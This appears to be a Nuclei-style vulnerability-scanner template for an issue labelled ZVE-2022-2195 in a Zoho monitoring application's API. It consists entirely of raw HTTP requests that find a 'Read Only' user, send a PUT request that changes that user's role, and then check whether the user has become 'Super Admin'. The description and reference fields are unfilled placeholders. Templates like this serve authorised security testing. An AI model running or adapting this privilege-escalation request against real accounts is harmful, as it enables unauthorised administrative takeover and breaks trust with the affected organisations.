id: ZVE-2022-2195

info:
  name: ZVE-2022-2195
  author: 3th1c_yuk1
  severity: high
  description: description
  reference: https://
  tags: ro_user, accounts, ZVE-2022-2195

requests:
  - raw:
      - |-
        GET /app/api/short/users_list HTTP/1.1
        Host: {{Hostname}}
        Authorization: Zoho-oauthtoken {{access_token}}


      - |-
        PUT /app/api/users/{{userid}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Zoho-oauthtoken {{access_token}}
        Content-Type: application/json;charset=utf-8

        {"is_edit_allowed":true,"is_client_portal_user":false,"is_account_contact":true,"is_invited":false,"subscribe_newsletter":true,"alert_settings":{"email_format":1,"anomaly":[],"critical":[],"applogs":[],"trouble":[],"up":[],"alerting_period":{"start_time":"00:00","end_time":"00:00"},"down":[]},"display_name":"test","zuid":"60016321360","is_contact":false,"selection_type":0,"user_role":10,"email_address":"yukesh.srinivasan+t01@zohotest.com","image_present":false,"notify_medium":[1]}


      - |-
        GET /app/api/short/users_list HTTP/1.1
        Host: {{Hostname}}
        Authorization: Zoho-oauthtoken {{access_token}}


    extractors:
      - type: json
        name: userid
        part: body
        internal: true
        json:
          - '.data.users[] | select(.user_role_name == "Read Only") | .user_id'

      - type: dsl
        name: blen
        internal: true
        dsl:
          - "len(body)"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '"user_id":"{{userid}}","display_name":"test","user_role_name":"Super Admin"'

      - type: status
        status:
          - 200
